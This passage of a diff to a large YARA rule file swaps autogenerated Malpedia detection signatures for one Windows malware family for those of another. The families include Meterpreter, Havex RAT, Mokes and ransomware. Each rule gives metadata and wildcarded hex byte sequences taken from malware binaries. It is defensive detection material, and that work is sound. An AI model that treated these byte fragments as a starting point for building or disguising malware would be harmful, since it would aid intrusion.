+		$sequence_8 = { ff15???????? 81c480000000 8d55c0 52 ff15???????? 8d4588 }
+		$sequence_9 = { ff15???????? 81c6a4000000 50 56 }
+		$sequence_10 = { ff15???????? 81e600020000 33c9 81fe00020000 }
+		$sequence_11 = { ff15???????? 81c608030000 8d45e8 56 }
+		$sequence_12 = { ff15???????? 81c608030000 8d8568ffffff 56 }
+		$sequence_13 = { ff15???????? 81e600200000 33d2 81fe00200000 }
+		$sequence_14 = { ff15???????? 81c480000000 8d8df8fcffff 51 }
+		$sequence_15 = { ff15???????? 833d????????00 7505 dc7dc0 }
 
 	condition:
-		7 of them and filesize < 580608
+		7 of them and filesize < 8560640
 }
-rule MALPEDIA_Win_Crat_Auto : FILE
+rule MALPEDIA_Win_Meterpreter_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6875ef99-cb78-5d35-8902-45286f9925fd"
+		id = "a6f1771a-05aa-5edf-806e-8f4646e6de38"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.crat_auto.yar#L1-L176"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.meterpreter"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.meterpreter_auto.yar#L1-L114"
 		license_url = "N/A"
-		logic_hash = "6a558eedfed48b48235f564ba72a779c4c350ad31cd93998f4d10b79b9d23f07"
+		logic_hash = "b31b408f14a6efeb814ec89850c20aeb2f6b49daa7fba766082bcbe19d74b589"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -86273,39 +86293,32 @@ rule MALPEDIA_Win_Crat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 488bd0 488d8d78010000 e8???????? 90 }
-		$sequence_1 = { 488bd0 488d8d38030000 e8???????? 90 }
-		$sequence_2 = { e8???????? 488bd0 488d8d28010000 e8???????? 90 }
-		$sequence_3 = { e8???????? 488bd0 488d4d90 e8???????? 90 488bd0 }
-		$sequence_4 = { e8???????? 488bd0 488d8db8000000 e8???????? 90 }
-		$sequence_5 = { e8???????? 488bd0 488d8d40010000 e8???????? 90 }
-		$sequence_6 = { e8???????? 488bd0 488d8de8000000 e8???????? 90 }
-		$sequence_7 = { ebd0 498bc4 48833d????????10 480f4305???????? 482bc8 }
-		$sequence_8 = { 33d2 c1e902 f7f1 eb02 }
-		$sequence_9 = { ffd0 85c0 750f ff15???????? 83f87a }
-		$sequence_10 = { 52 8b01 ff5004 c645fc08 8bcf 8b5648 }
-		$sequence_11 = { 2b460c f20f114dc0 83f810 7d0d 51 }
-		$sequence_12 = { 50 e8???????? 83c404 e8???????? 33d2 f7f7 81c2e8030000 }
-		$sequence_13 = { 52 8b01 ff5004 c645fc07 8bcf 8b5640 }
-		$sequence_14 = { 52 8b01 ff5004 c645fc06 8bcf 8b563c 83ea10 }
-		$sequence_15 = { 2b4624 83f810 7d09 51 }
-		$sequence_16 = { 3855e3 7408 8b4dd8 8b55dc eb04 8bce 33d2 }
+		$sequence_0 = { 7b5d c7400800000000 8b561c c7420c00000000 }
+		$sequence_1 = { c07d14eb 8b542472 8cd0 f733 ce }
+		$sequence_2 = { 56 e8???????? 85d9 f5 }
+		$sequence_3 = { e04f 1089471c8b8e 48 e600 00ee }
+		$sequence_4 = { 0000 68ffff0000 52 ffd7 8b2410 }
+		$sequence_5 = { 02c0 8bf7 b94c000061 f3ab 8b4573 8b4d0c 8bbdfc89068b }
+		$sequence_6 = { 57 57 897810 57 }
+		$sequence_7 = { 8d919248b299 40 93 49 722f }
+		$sequence_8 = { 8b3c87 1485 c9 896375 8b3b }
+		$sequence_9 = { d040f3 27 c0eb80 d440 0075cc b8???????? }
 
 	condition:
-		7 of them and filesize < 4161536
+		7 of them and filesize < 188416
 }
-rule MALPEDIA_Win_Yakuza_Ransomware_Auto : FILE
+rule MALPEDIA_Win_Havex_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0616b0d8-21b8-54e6-81ea-ef91fe1745e9"
+		id = "f3fbb0af-43ac-5647-9a79-89548fc57d3c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.yakuza_ransomware"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.yakuza_ransomware_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.havex_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.havex_rat_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "406ad1bef978847d25a0a40830a76c5748a247c44dcea0c0fe72a568e851fc77"
+		logic_hash = "9d2eae0c4a7abc70e6bf5636f95e7cb91a062b9062076188516a0129d3184ea5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -86319,32 +86332,32 @@ rule MALPEDIA_Win_Yakuza_Ransomware_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 83c404 c645fc5b 56 8bd0 8d8d20fbffff e8???????? }
-		$sequence_1 = { e8???????? 8d8520ffffff 83bd34ffffff08 0f438520ffffff 8d8dd8fbffff 51 }
-		$sequence_2 = { 50 e8???????? 0fb74c242c 8d7f02 83c414 85c0 b8ffff0000 }
-		$sequence_3 = { e9???????? c3 8b4568 83e002 0f840c000000 836568fd 8d4d48 }
-		$sequence_4 = { e9???????? c3 8b4dec 81c180000000 e9???????? 8b4d08 83c104 }
-		$sequence_5 = { 0fb6c9 0fb689409c4d00 3304cdd2735400 8b4df8 8b55fc 8b4c8a08 c1e900 }
-		$sequence_6 = { e8???????? 84c0 0f84d0010000 8d8d54f6ffff e8???????? 8bf0 89b5d4f1ffff }
-		$sequence_7 = { e8???????? c745fc00000000 8b4e24 85c9 7466 8b01 8d55dc }
-		$sequence_8 = { ff7508 8d45a8 50 8d4de0 e8???????? 8bf0 8d4e04 }
-		$sequence_9 = { 50 c745ac00000000 c745b007000000 e8???????? 837f1408 8bc7 7202 }
+		$sequence_0 = { 56 50 51 ff15???????? 68???????? 8d4dd8 8bf0 }
+		$sequence_1 = { 83c8ff 2b4560 3bd8 7601 49 42 ebe4 }
+		$sequence_2 = { 8d5c242c 89642428 8938 897808 89780c 897810 }
+		$sequence_3 = { 8b4508 c9 c3 3b442404 741c 56 8d7004 }
+		$sequence_4 = { 8d8e94c90000 8955d8 0fb69002010000 0fb638 c1e210 0bd7 8951fc }
+		$sequence_5 = { 8d4d88 0f9445c3 c645fc05 e8???????? 385dc3 7507 }
+		$sequence_6 = { e8???????? ff75ec 8d450c ff75e8 8bce 50 8b4508 }
+		$sequence_7 = { 6a01 50 ff7514 8d44243c ff7510 50 57 }
+		$sequence_8 = { 83c104 ff4df8 837df800 7fe3 8b75e0 }
+		$sequence_9 = { ff7004 ff15???????? 8bd8 83fb02 7504 32c0 eb2f }
 
 	condition:
-		7 of them and filesize < 2811904
+		7 of them and filesize < 892928
 }
-rule MALPEDIA_Win_Rawpos_Auto : FILE
+rule MALPEDIA_Win_Younglotus_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1ae7866b-5a11-5ecd-acc1-985240e6eeca"
+		id = "04c5b48c-c00c-5587-800f-b26c8ea57f39"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rawpos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rawpos_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.younglotus"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.younglotus_auto.yar#L1-L171"
 		license_url = "N/A"
-		logic_hash = "db91ad955030d7923a8e659a49a2b9f0e663571d73f741166c9c17758223d91f"
+		logic_hash = "0969f03b284985af7df0ddb5d516ceb371a29a3573bcea4b892c82226c445838"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -86358,32 +86371,38 @@ rule MALPEDIA_Win_Rawpos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 59 85c0 757b 0fbe4604 50 e8???????? 59 }
-		$sequence_1 = { 8bf8 33c0 8a07 83f845 7c05 b845000000 83f83b }
-		$sequence_2 = { 5d c3 55 8bec 83c4dc 33c0 33d2 }
-		$sequence_3 = { e8???????? 83c408 85c0 0f842e070000 8b4520 8d4df4 50 }
-		$sequence_4 = { 8bc3 f7d8 83f803 750a bb08000000 e9???????? }
-		$sequence_5 = { 837df400 7507 8bf7 e9???????? 803f10 7526 }
-		$sequence_6 = { c646ff10 c60601 46 8a45d0 8806 46 }
-		$sequence_7 = { 8a13 80c2d3 80ea02 720f 80c2fe 80ea02 7207 }
-		$sequence_8 = { 53 8b4510 83c6ff 50 57 52 e8???????? }
-		$sequence_9 = { eb03 83c8ff 5f 5e 5b 59 5d }
+		$sequence_0 = { 6802000080 e8???????? 83c41c 6a01 }
+		$sequence_1 = { c745e800000000 c745fc00000000 837d0c03 754c 6a03 }
+		$sequence_2 = { 8945c8 68???????? 8b45c8 50 }
+		$sequence_3 = { 83c404 8b4de0 51 ff55dc }
+		$sequence_4 = { c745ec00000000 c745fc00000000 8b450c 50 8b4d08 51 8b55e8 }
+		$sequence_5 = { 50 8b8d9cfeffff 51 ff15???????? c785a0feffff00000000 }
+		$sequence_6 = { 8b8d5cfeffff 83c114 e8???????? c645fc01 8b8d5cfeffff 83c124 e8???????? }
+		$sequence_7 = { 8b4508 50 e8???????? 83c404 8945a0 837da000 }
+		$sequence_8 = { 53 56 57 68???????? ff15???????? 8945dc 68???????? }
+		$sequence_9 = { 8b703c 03f0 813e50450000 0f85e8000000 }
+		$sequence_10 = { 83f802 7503 33c0 c3 6a01 58 }
+		$sequence_11 = { e8???????? 83c41c 8d85e8feffff 6804010000 53 50 }
+		$sequence_12 = { 33f6 8975fc 397508 68ff010000 56 56 }
+		$sequence_13 = { 85c0 8945f4 7e49 6a04 53 50 }
+		$sequence_14 = { ff750c ff7508 50 e8???????? 8d430f 83c40c }
+		$sequence_15 = { bf00040000 57 8d85e4fbffff 53 50 e8???????? }
 
 	condition:
-		7 of them and filesize < 466944
+		7 of them and filesize < 106496
 }
-rule MALPEDIA_Win_Darkcloud_Auto : FILE
+rule MALPEDIA_Win_Mokes_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "cd1b5f5a-7942-5b60-9ccf-fe3c4e2edece"
+		id = "b39bf037-fa7d-5a3c-86ca-2ed67b32fce6"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkcloud"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.darkcloud_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mokes"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mokes_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "aa0d92530fd9200448b5bea8151df68481eaae78d40aef44b3313e13499f3f86"
+		logic_hash = "b9e014e60ad1f3bca1bf46f5b4621f6e946c48cba595440a4767fbc6ec5a2bfa"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -86397,32 +86416,32 @@ rule MALPEDIA_Win_Darkcloud_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a00 68???????? 8d857cffffff 50 ff15???????? 8d8d7cffffff 51 }
-		$sequence_1 = { 8b9584feffff 52 8b8580feffff 50 ff15???????? 898568fdffff eb0a }
-		$sequence_2 = { 89952cffffff 6aff 8b45a8 50 8b4d08 8b11 52 }
-		$sequence_3 = { c7458c0a000000 c745a404000280 c7459c0a000000 c745b404000280 c745ac0a000000 8b45d8 }
-		$sequence_4 = { 83c418 c745fc11000000 ba???????? 8d4da0 ff15???????? 8d45a0 50 }
-		$sequence_5 = { 51 8d8544ffffff 52 50 ff15???????? }
-		$sequence_6 = { 8bd0 8d4d98 ff15???????? ba???????? 8d4dac ff15???????? 8b5598 }
-		$sequence_7 = { ff15???????? 8d4dc8 ff15???????? 8d4db8 ff15???????? c745fc0c000000 8b45d4 }
-		$sequence_8 = { 68???????? ff15???????? 8bd0 8d4da8 ff15???????? 8d4590 50 }
-		$sequence_9 = { 8d4d88 51 8d558c 52 8d4590 50 6a05 }
+		$sequence_0 = { f30f7f442438 8b442438 3b442428 751e 8b442440 3b442430 7514 }
+		$sequence_1 = { f20f5cd0 f20f58d1 f20f2cca 03c8 8d442430 894c2430 8b4c240c }
+		$sequence_2 = { ffb6c8010000 e8???????? 8b8e0c010000 8b4104 397808 7417 3b7808 }
+		$sequence_3 = { f6450801 56 8bf1 57 8b7e04 7423 8b0d???????? }
+		$sequence_4 = { ff742420 ba04000000 53 8d4a28 e8???????? 8b6c2420 8bf0 }
+		$sequence_5 = { ff5030 8b4004 f780e000000000000200 7404 c6432b01 807c241b00 8b5c2454 }
+		$sequence_6 = { ffd0 83c410 8b74240c 8b542418 8bca 8b7c241c 81c11ff9ef9e }
+		$sequence_7 = { f77e6c 89542420 8b450c 8b7004 807e7000 7407 8bce }
+		$sequence_8 = { ff74240c 889018020000 8b8e5c010000 e8???????? 80be9a02000000 7517 ff7604 }
+		$sequence_9 = { f6c310 7410 83e3ef 8d4c242c 895c2414 e8???????? c7442458ffffffff }
 
 	condition:
-		7 of them and filesize < 622592
+		7 of them and filesize < 18505728
 }
-rule MALPEDIA_Win_Unidentified_074_Auto : FILE
+rule MALPEDIA_Win_Grok_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0e88fd75-1316-5da0-a27c-d979440b0d1c"
+		id = "b9ba5cb5-3752-5e96-9a74-900c3065fa33"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_074"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_074_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.grok"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.grok_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "efaf1ffd6b205d550b6e92c44f0056ae88e73af2fe4605531aaeb9c3b3bf90af"
+		logic_hash = "0c97c5be712250fba8ecf0a25a041d30466c220a206e99d1c5c73f4b7d759714"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -86436,34 +86455,34 @@ rule MALPEDIA_Win_Unidentified_074_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4d0c 3bf1 752a 8b4614 83f808 7204 }
-		$sequence_1 = { 83f808 720d 40 50 ffb528e7ffff e8???????? }
-		$sequence_2 = { 8d8528e7ffff 50 8d8570e7ffff 50 8d85f8e6ffff 50 }
-		$sequence_3 = { 75f3 8bcf e8???????? 3bd0 }
-		$sequence_4 = { 8855ee 660f1f440000 0fb64435ec 50 51 }
-		$sequence_5 = { 33d2 8b4f10 33f6 c740140f000000 83781410 894ddc 8955e0 }
-		$sequence_6 = { 6800040000 8985f8f7ffff 8901 8d85fcfbffff }
-		$sequence_7 = { 8b85e0f7ffff 85c0 7407 50 ff15???????? 85ff }
-		$sequence_8 = { 8d4618 7202 8b00 837e1410 7202 8b36 6a00 }
-		$sequence_9 = { 8b853ce7ffff 83f808 720d 40 50 ffb528e7ffff }
+		$sequence_0 = { 3945f4 7308 8b4df4 c60100 ebe4 8b55f8 c7420900000000 }
+		$sequence_1 = { 8b8de0fdffff 8a11 8895dffdffff 8b85e4fdffff 3a10 7546 }
+		$sequence_2 = { 837d1004 7307 b8060200c0 eb0e 8b4508 8b403c c70030120000 }
+		$sequence_3 = { 0f8ca4000000 53 ff15???????? 8b0d???????? 3b01 8b3d???????? }
+		$sequence_4 = { 0f85a2000000 681c010000 8d85c8feffff 50 6a00 8b4d08 51 }
+		$sequence_5 = { 8975dc ff15???????? 85c0 8b1d???????? 7d11 be2a0000c0 ff75f8 }
+		$sequence_6 = { a1???????? 83c40c c780bc01000001000000 33c0 5f 5e 5d }
+		$sequence_7 = { b81a0000c0 eb5c 50 8d460a 56 50 e8???????? }
+		$sequence_8 = { b89a0000c0 eb51 8d45f8 50 ff75f8 56 6a01 }
+		$sequence_9 = { 85c0 0f842d010000 8b742410 8b3d???????? 6a00 6a10 6a01 }
 
 	condition:
-		7 of them and filesize < 335872
+		7 of them and filesize < 84992
 }
-rule MALPEDIA_Win_Flusihoc_Auto : FILE
+rule MALPEDIA_Win_Redalpha_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "70e43055-e110-5f44-83f7-dea02c83279f"
+		id = "882ba549-5d0f-5044-9824-7266c16fd3e3"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.flusihoc"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.flusihoc_auto.yar#L1-L170"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.redalpha"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.redalpha_auto.yar#L1-L286"
 		license_url = "N/A"
-		logic_hash = "03055e982040b1f87a417ce4ea912aa6346f4a9287782a46033bfb1539ddc34d"
+		logic_hash = "6d0bc4e07b8bfd5d42ec13b7e486282bb3ab0b08b56807472d5876342a41efce"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -86475,38 +86494,52 @@ rule MALPEDIA_Win_Flusihoc_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 740b 40 8816 8a1408 46 }
-		$sequence_1 = { 8b442410 6aff 50 ff15???????? 8b4c2410 }
-		$sequence_2 = { 57 6a40 8d442428 6a00 50 c744242c44000000 e8???????? }
-		$sequence_3 = { f3a5 c684246402000000 e8???????? 68d6000000 }
-		$sequence_4 = { 7507 80864d01000004 83f822 7506 fe8e42010000 }
-		$sequence_5 = { 8bec 83e4f8 81ece40b0000 a1???????? 33c4 898424e00b0000 53 }
-		$sequence_6 = { 8d7c2428 50 f3a5 c684246401000000 }
-		$sequence_7 = { 33c0 888c045e010000 8a4c042c 40 }
-		$sequence_8 = { 8b8c24ec0b0000 5f 5e 5b 33cc 33c0 e8???????? }
-		$sequence_9 = { ff15???????? 8b4c2410 51 ffd6 8b542414 52 ffd6 }
-		$sequence_10 = { fe06 fe461e 3d68010000 7505 fe06 fe4e17 }
-		$sequence_11 = { 52 ffd6 6a0a ff15???????? }
-		$sequence_12 = { 8b8df4feffff 6804010000 8d85f8feffff 50 6a01 }
-		$sequence_13 = { 8b95f4feffff 52 ff15???????? 8b4dfc 33cd 33c0 }
-		$sequence_14 = { 51 6a00 ff15???????? 8d95f4feffff 52 6806000200 }
-		$sequence_15 = { 6a00 68???????? 6802000080 ff15???????? 85c0 752f }
+		$sequence_0 = { 83c40c c0e304 0fb6c3 50 68???????? }
+		$sequence_1 = { 68???????? 50 e8???????? 83c40c c0e304 }
+		$sequence_2 = { 8b4314 015330 ffd0 5f }
+		$sequence_3 = { 8b4310 ffd0 8945fc 85c0 }
+		$sequence_4 = { 488da998000000 458be0 4c8be9 488bfa 488d4d20 ff15???????? 488b4508 }
+		$sequence_5 = { 8785c8000000 488b8dd8000000 ff15???????? 488b8de0000000 ff15???????? 48c785d8000000ffffffff }
+		$sequence_6 = { 8b4328 8bcb 52 8b5310 }
+		$sequence_7 = { 89048b 488b4d58 418bc5 48c1e002 480101 }
+		$sequence_8 = { eb0e 48897da0 41bc13000000 48897da8 498b1e }
+		$sequence_9 = { d3eb 442bd9 400fb6d7 f6c210 753d 0f1f840000000000 }
+		$sequence_10 = { 8b430c ffd0 8d50ff 8b45fc 03f2 }
+		$sequence_11 = { e9???????? 488d5908 488d4b20 ff15???????? 488b4308 48894310 ba00040000 }
+		$sequence_12 = { 8b4328 52 8b5310 2b5604 }
+		$sequence_13 = { 8b4324 8975f8 8945dc 8b4328 }
+		$sequence_14 = { 48897db8 448865c0 4533c9 4533c0 33d2 33c9 }
+		$sequence_15 = { e8???????? 48c744243000000000 c744242880000000 c744242002000000 4533c9 4533c0 }
+		$sequence_16 = { 89441f05 8b85c0feffff 89441f09 8b85c4feffff }
+		$sequence_17 = { 6a00 6a00 8d8534ffffff c78514feffff08b94000 898518feffff 8d8514feffff }
+		$sequence_18 = { e8???????? 8b404c 83b8a800000000 7512 8b04bd30744100 807c302900 }
+		$sequence_19 = { 660fd60f 8d7f08 8b048d343b4000 ffe0 }
+		$sequence_20 = { 8bec 81ec1c010000 56 6880000000 8bf1 c745f8ff000000 6a00 }
+		$sequence_21 = { 8d44241c 50 8d442424 50 8d442418 }
+		$sequence_22 = { 8d45f4 8bcf 50 e8???????? 5f 5e 5b }
+		$sequence_23 = { 6a34 68???????? 57 ff15???????? 8bf0 85f6 7517 }
+		$sequence_24 = { ff15???????? 8bf8 85ff 7459 6a00 }
+		$sequence_25 = { c745dc03000000 eb7c c745e040314100 ebbb d9e8 8b4510 dd18 }
+		$sequence_26 = { 8b4710 8d044502000000 50 7219 }
+		$sequence_27 = { 50 f3a5 8d8574ffffff 8bca }
+		$sequence_28 = { c1fa06 8934b8 8bc7 83e03f 6bc830 8b0495581f4000 8b440818 }
+		$sequence_29 = { 7517 57 ff15???????? 5e 5f 8b4dfc }
 
 	condition:
-		7 of them and filesize < 319488
+		7 of them and filesize < 606208
 }
-rule MALPEDIA_Win_Echo_Gather_Auto : FILE
+rule MALPEDIA_Win_Http_Troy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7335def2-506d-5260-8b0d-ff3650457aaa"
+		id = "95fd4364-0c49-5029-9362-b053f1981ad0"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.echo_gather"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.echo_gather_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.http_troy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.http_troy_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "b9e20804863a93244aef376504c1242a73dc60c7321ec31adf915aed9161664d"
+		logic_hash = "f51f643b968f327406be07b32339103de989865626147227f095521c9d0409e5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -86520,32 +86553,32 @@ rule MALPEDIA_Win_Echo_Gather_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4989d9 4d89fc 488b5c2430 4c8b7c2438 4589f0 4183fe39 0f8451030000 }
-		$sequence_1 = { 488b45d8 4889c1 488b05???????? ffd0 e9???????? 8b45bc }
-		$sequence_2 = { 74c4 b920000000 e8???????? 8b4324 83c001 894324 4183ed01 }
-		$sequence_3 = { 48898424f8040000 488b842450040000 4889842400050000 66c78424e00400000000 e8???????? 4889c2 488b4d10 }
-		$sequence_4 = { 743f 48c1ea20 7539 4883eb01 4889da e8???????? 85c0 }
-		$sequence_5 = { 7561 4181fd7a000780 7409 4181fd26000780 75b4 }
-		$sequence_6 = { 0f94c0 84c0 744a 8b45ec 89c0 4889c2 b940000000 }
-		$sequence_7 = { 48c78424a800000011000000 c78424bc00000000000000 eb31 8b8424bc000000 4898 488b54c420 488b4510 }
-		$sequence_8 = { 488d8c2450010000 488d942450020000 488d842450030000 4989c8 4889c1 e8???????? }
-		$sequence_9 = { ba01000000 b9f1000000 e8???????? 488945f0 488b05???????? }
+		$sequence_0 = { 33c9 894c241d 8d443bfb 3be8 66894c2421 8bf5 c644241c00 }
+		$sequence_1 = { 895e70 899e90000000 895e74 750a 5e b800000100 }
+		$sequence_2 = { 8d442414 50 8d4c241c 51 6a00 6a00 6a00 }
+		$sequence_3 = { 33f1 33f0 03f3 8dbc37a9cfde4b 8bf7 c1e70b 8b5c2430 }
+		$sequence_4 = { e8???????? 83c418 ff7508 e8???????? 83c404 833d????????00 752c }
+		$sequence_5 = { 0bd3 4f 8956fc 75da }
+		$sequence_6 = { e8???????? 59 83e6fb e9???????? 84c3 0f84d8000000 f6451008 }
+		$sequence_7 = { 6802000080 c744242800000000 ff15???????? 8b542418 8d442408 }
+		$sequence_8 = { 8d8c2478010000 51 ffd6 b801000000 8b8c2414110000 e8???????? 5f }
+		$sequence_9 = { 6a00 68???????? e8???????? 8b54241c 83c404 50 52 }
 
 	condition:
-		7 of them and filesize < 246784
+		7 of them and filesize < 475136
 }
-rule MALPEDIA_Win_Applejeus_Auto : FILE
+rule MALPEDIA_Win_Knot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c7de82bf-02e2-54ab-8e92-30ad8fa19555"
+		id = "3b476922-c990-533b-9ea2-55281d49e06f"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.applejeus"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.applejeus_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.knot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.knot_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "7da7577e0a48835aa3f87ca6b5019a6bd26bede335ed264656ca8273c5cb6ea4"
+		logic_hash = "9a4cc690c1caf46b1d80d5ed99f629971e8f9dd8073d7d2fdb62a67bbf85c7b7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -86559,32 +86592,32 @@ rule MALPEDIA_Win_Applejeus_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bb540eeffff 56 ff15???????? 56 ffd7 ffb5e0edffff ffd7 }
-		$sequence_1 = { 8bc8 51 e8???????? 83c404 c7460800000000 c7460400000000 ff36 }
-		$sequence_2 = { 8b75e4 83c410 0bf0 c745d8d4b24500 8d45dc 50 e8???????? }
-		$sequence_3 = { 8bf8 ffd6 ffb5b0fdffff 8bb588feffff 8bc8 b8ed73484d }
-		$sequence_4 = { 897008 e8???????? 8d8dd8ecffff e8???????? 8d8dd4efffff e8???????? 6a64 }
-		$sequence_5 = { 6a08 c645fc16 e8???????? 83c404 8985e4f6ffff 898568f4ffff c700???????? }
-		$sequence_6 = { 0f84d3000000 8b048d74db4500 8985a4f8ffff 85c0 0f8498000000 83f801 0f84b5000000 }
-		$sequence_7 = { 8bf0 6a0c 8975e4 8975d0 0f114604 c706???????? f30f7e45c4 }
-		$sequence_8 = { 8885fcfcffff 8b85dcfcffff 041d 83f05c 8885fdfcffff 8b85dcfcffff }
-		$sequence_9 = { 8b4308 33ff 807e2c00 8945c4 0f842e010000 8b4808 0f57c0 }
+		$sequence_0 = { 85c0 7407 c685f3fdffff00 ebbe 0fb68df3fdffff 83f901 }
+		$sequence_1 = { ff15???????? 85c0 0f855ffdffff 8b958cf9ffff }
+		$sequence_2 = { 6a00 6a02 6a00 8b4df8 51 }
+		$sequence_3 = { 8bec 81ec24020000 e8???????? 8945fc c785ecfdffff02000000 }
+		$sequence_4 = { 7507 32c0 e9???????? 6a00 6a00 6a00 6a02 }
+		$sequence_5 = { 8d8dd0fdffff 51 6a08 8d95c8fdffff }
+		$sequence_6 = { 7454 6a00 6a00 6a00 6a04 8b55f4 52 }
+		$sequence_7 = { 83c40c 8985e8fdffff 8b8de8fdffff 898ddcfdffff 83bddcfdffff03 7402 }
+		$sequence_8 = { 6a00 6a00 6800000040 8d95e0fdffff }
+		$sequence_9 = { e8???????? 8985d0feffff e9???????? 8b8dd4feffff 51 ff15???????? 8be5 }
 
 	condition:
-		7 of them and filesize < 1245184
+		7 of them and filesize < 59392
 }
-rule MALPEDIA_Win_Lockergoga_Auto : FILE
+rule MALPEDIA_Win_Hawkball_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c3b2e831-52cd-5711-8143-4c283c706434"
